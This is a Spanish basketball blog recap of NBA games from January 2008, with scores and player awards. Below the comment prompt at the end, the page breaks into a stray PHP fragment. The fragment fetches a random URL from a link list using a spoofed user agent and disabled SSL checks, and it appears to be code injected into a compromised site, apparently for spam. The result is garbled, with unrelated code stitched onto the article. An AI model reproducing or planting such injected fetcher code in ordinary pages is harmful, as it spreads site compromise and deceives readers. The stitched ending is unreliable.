La crónica (15/01/08)

16 de January de 2008 por MagicJohnson32

Ocho partidos y bastantes emociones en la pasada madrugada. Los Nuggets cayeron en cancha de los emergentes Hawks en un partido en el que los de Denver vieron como dos de sus mejores jugadores anoche, Iverson y JR Smith, fueron expulsados tras protestar dos faltas no señaladas. En Orlando, un parcial de 10-32 en el tercer cuarto y una gran actuación de Rashard Lewis dejaron sin opciones a los Bulls. En el Madison, los Knicks lograron lo que los Celtics no pudieron, ganar a los Wizards. Los Pistons, que venían de hacer precisamente ante los Knicks uno de los mayores ridículos de la historia de la franquicia, se impusieron claramente a los Raptors con un gran Hamilton, autor de un espectacular 16 de 22 en tiros de campo. En Minnesota, Baron Davis y Stephen Jackson llevaron a los Warriors hasta cotas que no alcanzaban desde la 93-94, 7 partidos por encima del 50% (23-16). Los Grizzlies volvieron a caer en un final ajustado, esta vez ante los Cavs de LeBron, que se fue hasta los 51 puntos en un encuentro decidido en la prórroga. Navarro logró 26 puntos y forzó la prórroga con un triple a 10 segundos para el final, mientras que Gasol hizo 19-12. Los Sixers acabaron con su propia racha de derrotas y con la de victorias de los Rockets, a los que les remontaron 16 puntos en la segunda mitad, 12 en el último cuarto. Por último, los Clippers dejaron a los Lakers como líderes en solitario del Oeste al superar a los Suns con un magnífico Cassell, autor de 32 puntos.

Seguimos con los resultados y los premios:

Nuggets 93 – 104 Hawks

Bulls 88 – 102 Magic

Wizards 93 – 105 Knicks

Raptors 89 – 103 Pistons

Warriors 105 – 98 Wolves

Cavs 132 – 124 Grizzlies

Sixers 111 – 107 Rockets

Suns 90 – 97 Clippers

Nuestro MVP: Dos jugadores destacaron especialmente anoche. Richard Hamilton se desquitó contra los Raptors de su desastrosa actuación ante los Knicks. Logró 39 puntos con un acierto impresionante, 16 de 22 en tiros de campo, obtuvo su mejor marca en triples con 5 aciertos de 6 intentos, y añadió 4 rebotes y 6 asistencias sin una sola pérdida. Por su parte, LeBron James superó por cuarta vez en su carrera la marca de 50 puntos. Anoche ante los Grizzlies se fue hasta los 51, con 25 puntos entre el 4º periodo y la prórroga. Lo hizo con 18 de 28 en tiros de campo, 9 asistencias, 8 rebotes y 3 robos, y su único lunar fue, como de costumbre, desde la línea de tiros libres (9 de 16).

El rookie de la noche: Buena jornada en general para los novatos. Horford sigue demostrando su gran nivel reboteador, Conley confirma que puede ser un base a tener en cuenta en el futuro, Noah aprovecha sus minutos y firma un doble-doble… Pero, siendo un poco chauvinistas, los 26 puntos, 6 triples, 9 de 16 en tiros de campo, 4 asistencias y una gran canasta para forzar la prórroga elevan a Juan Carlos Navarro como el mejor novato de la pasada madrugada. Iavaroni correspondió al gran juego del escolta catalán dándole más de 46 minutos.

navarro3cavs

La sorpresa: Antoine Walker llevaba un total de 5 puntos en los últimos 4 partidos. Frente a los Warriors, sin embargo, Walker obtuvo su mejor marca de la temporada con 26 puntos, 10 de 15 en tiros de campo, 4 de 7 en triples y 10 rebotes. Y todo ello, en apenas 25 minutos. Pero Toine gastó en vano uno de los pocos cartuchos que le quedan, ya que los Wolves cayeron ante Golden State.

La decepción: ya hay que hacerlo mal en los Warriors para quedarse sin anotar. Andris Biedrins lo logró ante los Wolves al fallar los 5 tiros que intentó en casi 26 minutos de juego. Sus 8 rebotes no esconden una pobre actuación que incluyó 3 pérdidas, 0 asistencias y 0 tapones. Aunque peor fue lo de Deng y Gordon, teóricos líderes de los Bulls y que ante los Magic prácticamente ni aparecieron: 16 puntos, 4 rebotes y 2 asistencias entre los dos.

aiversonhawks

 

 

Pasatiempos: adivine a quién está echando el árbitro:

A) a Allen Iverson

B) a J.R. Smith

C) al halcón

D) A y B son correctas

Acabamos con las 10 mejores jugadas de la noche, entre ellas dos de Juan Carlos Navarro:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>